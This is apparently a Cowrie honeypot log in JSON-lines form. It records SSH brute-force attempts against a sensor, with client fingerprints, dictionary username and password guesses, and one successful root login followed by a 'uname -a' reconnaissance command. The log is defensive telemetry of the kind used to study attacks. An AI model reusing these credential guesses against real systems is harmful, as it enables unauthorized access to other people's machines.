{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password","message":"login attempt [ftpuser/password] failed","sensor":"my-vps","timestamp":"2025-08-28T12:12:00.654639Z","src_ip":"212.227.125.160","session":"65b3728766e9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:12:00.824178Z","src_ip":"212.227.125.160","session":"ef545ee265dd"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:12:00.825106Z","src_ip":"212.227.125.160","session":"ef545ee265dd"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:12:01.716848Z","src_ip":"212.227.125.160","session":"ef545ee265dd"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:12:01.825438Z","src_ip":"212.227.125.160","session":"65b3728766e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48776,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c823d64fe89","protocol":"ssh","message":"New connection: 212.227.125.160:48776 (1.2.3.4:22) [session: 6c823d64fe89]","sensor":"my-vps","timestamp":"2025-08-28T12:12:01.870986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:12:02.309663Z","src_ip":"212.227.125.160","session":"6c823d64fe89"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:12:02.310418Z","src_ip":"212.227.125.160","session":"6c823d64fe89"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:12:03.241986Z","src_ip":"212.227.125.160","session":"6c823d64fe89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56448,"dst_ip":"1.2.3.4","dst_port":22,"session":"5deb041a7303","protocol":"ssh","message":"New connection: 212.227.125.160:56448 (1.2.3.4:22) [session: 5deb041a7303]","sensor":"my-vps","timestamp":"2025-08-28T12:12:33.964930Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62428,"dst_ip":"1.2.3.4","dst_port":22,"session":"5819b45005cd","protocol":"ssh","message":"New connection: 212.227.235.229:62428 (1.2.3.4:22) [session: 5819b45005cd]","sensor":"my-vps","timestamp":"2025-08-28T12:12:34.452802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:12:34.454359Z","src_ip":"212.227.235.229","session":"5819b45005cd"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:12:34.606928Z","src_ip":"212.227.235.229","session":"5819b45005cd"}
{"eventid":"cowrie.login.failed","username":"reid","password":"reid","message":"login attempt [reid/reid] failed","sensor":"my-vps","timestamp":"2025-08-28T12:12:35.338074Z","src_ip":"212.227.235.229","session":"5819b45005cd"}
{"eventid":"cowrie.login.failed","username":"reid","password":"reid1","message":"login attempt [reid/reid1] failed","sensor":"my-vps","timestamp":"2025-08-28T12:12:36.500704Z","src_ip":"212.227.235.229","session":"5819b45005cd"}
{"eventid":"cowrie.login.failed","username":"reid","password":"reid123","message":"login attempt [reid/reid123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:12:37.663850Z","src_ip":"212.227.235.229","session":"5819b45005cd"}
{"eventid":"cowrie.login.failed","username":"reid","password":"reid1234","message":"login attempt [reid/reid1234] failed","sensor":"my-vps","timestamp":"2025-08-28T12:12:38.833365Z","src_ip":"212.227.235.229","session":"5819b45005cd"}
{"eventid":"cowrie.login.failed","username":"reid","password":"reid12345","message":"login attempt [reid/reid12345] failed","sensor":"my-vps","timestamp":"2025-08-28T12:12:39.997403Z","src_ip":"212.227.235.229","session":"5819b45005cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41744,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6f555e26ee0","protocol":"ssh","message":"New connection: 212.227.125.160:41744 (1.2.3.4:22) [session: e6f555e26ee0]","sensor":"my-vps","timestamp":"2025-08-28T12:12:40.160228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:12:40.161279Z","src_ip":"212.227.125.160","session":"e6f555e26ee0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:12:40.330919Z","src_ip":"212.227.125.160","session":"e6f555e26ee0"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456789","message":"login attempt [ftpuser/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T12:12:40.975314Z","src_ip":"212.227.125.160","session":"e6f555e26ee0"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:12:41.158331Z","src_ip":"212.227.235.229","session":"5819b45005cd"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:12:42.146364Z","src_ip":"212.227.125.160","session":"e6f555e26ee0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59596,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ba8932df240","protocol":"ssh","message":"New connection: 212.227.125.160:59596 (1.2.3.4:22) [session: 7ba8932df240]","sensor":"my-vps","timestamp":"2025-08-28T12:13:23.001385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:13:23.002334Z","src_ip":"212.227.125.160","session":"7ba8932df240"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:13:23.169454Z","src_ip":"212.227.125.160","session":"7ba8932df240"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345","message":"login attempt [ftpuser/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T12:13:23.673877Z","src_ip":"212.227.125.160","session":"7ba8932df240"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:13:24.843410Z","src_ip":"212.227.125.160","session":"7ba8932df240"}
{"eventid":"cowrie.session.closed","duration":"59.9","message":"Connection lost after 59.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:13:33.878532Z","src_ip":"212.227.125.160","session":"5deb041a7303"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":45726,"dst_ip":"1.2.3.4","dst_port":22,"session":"961ad251ef8e","protocol":"ssh","message":"New connection: 186.225.142.90:45726 (1.2.3.4:22) [session: 961ad251ef8e]","sensor":"my-vps","timestamp":"2025-08-28T12:13:47.928798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:13:48.089539Z","src_ip":"186.225.142.90","session":"961ad251ef8e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T12:13:48.320728Z","src_ip":"186.225.142.90","session":"961ad251ef8e"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:13:50.480912Z","src_ip":"186.225.142.90","session":"961ad251ef8e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T12:13:52.004344Z","src_ip":"186.225.142.90","session":"961ad251ef8e"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T12:13:52.005127Z","src_ip":"186.225.142.90","session":"961ad251ef8e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:13:52.446345Z","src_ip":"186.225.142.90","session":"961ad251ef8e"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:13:52.665599Z","src_ip":"186.225.142.90","session":"961ad251ef8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54324,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b25fd3f507f","protocol":"ssh","message":"New connection: 212.227.125.160:54324 (1.2.3.4:22) [session: 7b25fd3f507f]","sensor":"my-vps","timestamp":"2025-08-28T12:13:59.617700Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:13:59.680231Z","src_ip":"212.227.125.160","session":"7b25fd3f507f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55698,"dst_ip":"1.2.3.4","dst_port":22,"session":"017e64b92198","protocol":"ssh","message":"New connection: 212.227.125.160:55698 (1.2.3.4:22) [session: 017e64b92198]","sensor":"my-vps","timestamp":"2025-08-28T12:14:06.990868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:14:06.991815Z","src_ip":"212.227.125.160","session":"017e64b92198"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:14:07.164482Z","src_ip":"212.227.125.160","session":"017e64b92198"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345678","message":"login attempt [ftpuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T12:14:07.686191Z","src_ip":"212.227.125.160","session":"017e64b92198"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:14:08.862893Z","src_ip":"212.227.125.160","session":"017e64b92198"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34372,"dst_ip":"1.2.3.4","dst_port":22,"session":"1691669bda19","protocol":"ssh","message":"New connection: 212.227.125.160:34372 (1.2.3.4:22) [session: 1691669bda19]","sensor":"my-vps","timestamp":"2025-08-28T12:14:52.826214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:14:52.827158Z","src_ip":"212.227.125.160","session":"1691669bda19"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:14:53.003865Z","src_ip":"212.227.125.160","session":"1691669bda19"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"qwerty","message":"login attempt [ftpuser/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T12:14:53.714776Z","src_ip":"212.227.125.160","session":"1691669bda19"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:14:54.893483Z","src_ip":"212.227.125.160","session":"1691669bda19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34026,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcf543b9871b","protocol":"ssh","message":"New connection: 212.227.125.160:34026 (1.2.3.4:22) [session: fcf543b9871b]","sensor":"my-vps","timestamp":"2025-08-28T12:15:38.317011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:15:38.318751Z","src_ip":"212.227.125.160","session":"fcf543b9871b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:15:38.493965Z","src_ip":"212.227.125.160","session":"fcf543b9871b"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123123","message":"login attempt [ftpuser/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:15:39.203381Z","src_ip":"212.227.125.160","session":"fcf543b9871b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:15:40.559421Z","src_ip":"212.227.125.160","session":"fcf543b9871b"}
{"eventid":"cowrie.session.connect","src_ip":"182.115.128.244","src_port":41884,"dst_ip":"1.2.3.4","dst_port":23,"session":"1d0c5c6554e7","protocol":"telnet","message":"New connection: 182.115.128.244:41884 (1.2.3.4:23) [session: 1d0c5c6554e7]","sensor":"my-vps","timestamp":"2025-08-28T12:15:53.987548Z"}
{"eventid":"cowrie.session.closed","duration":13.615947246551514,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:16:07.603401Z","src_ip":"182.115.128.244","session":"1d0c5c6554e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55646,"dst_ip":"1.2.3.4","dst_port":22,"session":"838dcf9216b3","protocol":"ssh","message":"New connection: 212.227.125.160:55646 (1.2.3.4:22) [session: 838dcf9216b3]","sensor":"my-vps","timestamp":"2025-08-28T12:16:21.695625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:16:21.696571Z","src_ip":"212.227.125.160","session":"838dcf9216b3"}
